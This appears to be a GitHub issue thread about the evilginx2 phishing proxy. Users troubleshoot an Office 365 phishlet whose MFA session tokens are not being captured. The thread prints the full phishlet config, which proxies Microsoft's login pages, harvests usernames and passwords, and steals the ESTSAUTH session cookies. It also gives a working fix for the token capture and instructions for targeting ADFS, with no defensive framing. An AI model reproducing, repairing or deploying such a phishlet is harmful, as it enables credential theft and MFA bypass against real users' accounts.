MFA Tokens not capture
bhatsy06 opened this issue · comments
I have installed evilginx2 per instructions here. I have setup a lure for o365 using default settings. For some reason even when i am doing MFA using SMS on my phone of Microsoft I am not seeing the MFA token being captured. Is there anything i need to add to the o365.yaml file to make this work? I have blacklist set to unauth.
/evilginx2/phishlets$ more o365.yaml
name: 'o365'
author: '@JamesCullum'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
- {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
The lines below are needed if your target organization utilizes ADFS.
If they do, you need to uncomment all following lines that contain <...>
To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:
= adfs
= example.com
= adfs.example.com
#- {phish_sub: 'adfs', orig_sub: '', domain: '', session: true, is_landing:false}
#- {phish_sub: 'adfs', orig_sub: '', domain: ':443', session: true, is_landing:false}
sub_filters:
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname
}', mimes: ['text/html', 'application/json', 'application/javascript']} - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: [
'text/html', 'application/json', 'application/javascript'], redirect_only: true}
Uncomment and fill in if your target organization utilizes ADFS
#- {triggers_on: '', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}',
mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
- domain: '.login.microsoftonline.com'
keys: ['ESTSAUTH','ESTSAUTHPERSISTENT','SignInStateCookie'] - domain: 'login.microsoftonline.com'
keys: ['ESTSAUTH','ESTSAUTHPERSISTENT','SignInStateCookie']
credentials:
username:
key: '(login|UserName)'
search: '(.)'
type: 'post'
password:
key: '(passwd|Password)'
search: '(.)'
type: 'post'
login:
domain: 'login.microsoftonline.com'
path: '/'
I was able to resolve this updating the phishlet as shown. Basically remove the "domain: 'login.microsoftonline.com'
keys: ['SignInStateCookie']" and condense it into just one as shown below. Hope this helps someone else looking into this.
auth_tokens:
- domain: '.login.microsoftonline.com'
keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
credentials:
username:
Hey I was trying to figure out how did you update the file with the code you claim fixed the problem. Cause I'm having same problem like I don't receive any results login and token no matter what I tried
IM VERY DISAPPOINTED AT THE OWNER ITSELF @Mrgretzky I REALLY LIVE YOUR TOOLS I ONLY HAD ISSUE AND WAS TRYING TO GET THE UPDATE YOU CLAIM I PAID HIM HE SEND ME A YAML FILE THAT DONT WORK WORSE THAN EVEN THE ONE IN THE FREE TOOLS . AND SINCE HE DONT REPLY MY MESSAGE THATS JUST SAD CAUSE I DID TRUST YOU
Hey, @LekinriGhost @bhatsy06 i am reviewing this project for now. Are there any problems with it for now? Let me know so i can close the issues.